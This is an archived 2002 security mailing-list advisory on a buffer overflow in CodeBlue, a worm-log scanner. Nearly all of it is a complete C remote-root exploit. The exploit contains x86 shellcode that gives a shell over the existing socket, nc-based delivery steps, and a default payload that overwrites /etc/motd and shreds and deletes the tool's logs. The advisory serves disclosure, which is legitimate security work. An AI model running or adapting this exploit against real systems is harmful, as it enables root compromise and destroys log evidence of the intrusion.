[EXPL] CodeBlue Vulnerable to an Exploitable Buffer Overflow
From: support@securiteam.comDate: 02/17/02
- Previous message: support@securiteam.com: "[UNIX] Exim -C Security Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sun, 17 Feb 2002 17:25:13 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
CodeBlue Vulnerable to an Exploitable Buffer Overflow
------------------------------------------------------------------------
SUMMARY
<http://freshmeat.net/projects/codeblue/> CodeBlue is an attempt to
increase the awareness of hosts that are infected with malicious worms by
scanning Apache log files and emailing the infected hosts with details of
their infection and how to obtain help removing the worm. Currently,
CodeBlue scans Apache logs for Code Red, Code Red 2, and Nimda. A security
vulnerability in the product allows remote attackers to cause the program
to crash executing arbitrary commands.
DETAILS
Exploit code:
/*
* Demonstration linux-x86 remote root against codeblue v1.1 (from file
header)
* Otherwise it's known as CodeBlue v4
*
* This is a rather trivial to exploit...
*
* From get_smtp_reply()
*
* "We'll loop infinately, receiving
* 1 byte at a time until we receive a carriage return
* or line-feed character, signifying the end of the output"
*
* The stack looks like
*
* int get_smtp_reply(int sd)
* {
* char response[1024];
* char reply_message[1024];
* ...
* I probably don't have to mention it, but it reads the response into
response.
* ...
*
* Also, since this is meant to increase security a little, why doesn't it
* filter non-alphanumeric chars? Also, since it is playing with untrusted
* data, why doesn't it drop uids, instead of insisting as running as
root?
*
* if ((userid = getuid()) != 0) {
* fprintf(stderr, "uid %d is invalid!\n", userid);
* fprintf(stderr, "This program MUST be run as root\n");
* exit(1);
* }
*
* Usage: gcc exp.c -o exp; ./exp | nc -l -p 25
* Now you could do (one another terminal)
* printf "GET /default.ida?NNNNNN HTTP/1.0\n\n" | nc remotehost 80
* and wait until codeblue runs.
*
* Granted, nc makes it remote, but why reinvent the wheel?
*
* Oh, and by the way, you'll most likely have to change the offset down
there.
* Lots of improvements could (well, have) be done, such as a select(),
read(),
* write(), so you can get a remote terminal... at the moment, all it'll
do
* is make the id command display. Brute force is interesting, because you
* have to wait until it's run. I suspect, though I haven't tried, you
could
* almost double the nop size by playing around with reply_message.
*
* If you had a sense of humour, you probably could turn this into a worm.
This
* is one of the reason I don't really like automated response/attack
software.
* Or you could just trojan/modify your existing smtp do to this whenever
it
* recieves a HELO localhost...
*
* The interesting part of this is the bug in codeblue helped me win
* a wargame. We where given root an a box in a lan, and got to penertrate
* several others. Since the person running it was sick of being scanned
by
* the various worms, he was running this....
*
* Now for the paranoia part, how many of those scans have you recieved
where
* to check if you where running CodeBlue?
*
* laters,
* -- Andrew Griffiths
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
/* The shellcode beats doing a bindshell/connect code, since codeblue
already is
* talking to our (supposed) smtp server, so all we have to do is redirect
* stdin/out/err to fd 5. (Assuming fd 5 is the smtp connection. It was on
* mine.)
*/
unsigned char sc[] =
/* dupsh basically, dup2(5, (0,1,2)) */
"\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x05"
"\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
/* Standard aleph1 shellcode */
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c"
"\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08"
"\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80"
"\xe8\xde\xff\xff\xff/bin/sh";
int main()
{
unsigned char buf[3000];
memset(buf, 0, 3000);
memset(buf, 0x90, 967);
strncpy(buf+967, sc, strlen(sc));
fprintf(stderr, "buf: %s\n", buf);
fprintf(stderr, "strlen(buf): %d\n", strlen(buf));
buf[1036] = 0xd0;
buf[1037] = 0xdf;
buf[1038] = 0xff;
buf[1039] = 0xbf;
#ifdef ICANMODIFYCCODEORMODIFYCOMPILETIMEFLAGS
strcpy(buf + 1040, " id");
#else
strcpy(buf + 1040, " echo warning codeblue has a remote root hole in it
>/etc/motd; shred -z codeblue*log* 2>/dev/null; rm -f codeblue*log*
2>/dev/null; echo you sux. RTFC...");
#endif
printf("%s", buf);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:andrewg@tasmail.com> Andrew
Griffiths.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Exim -C Security Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
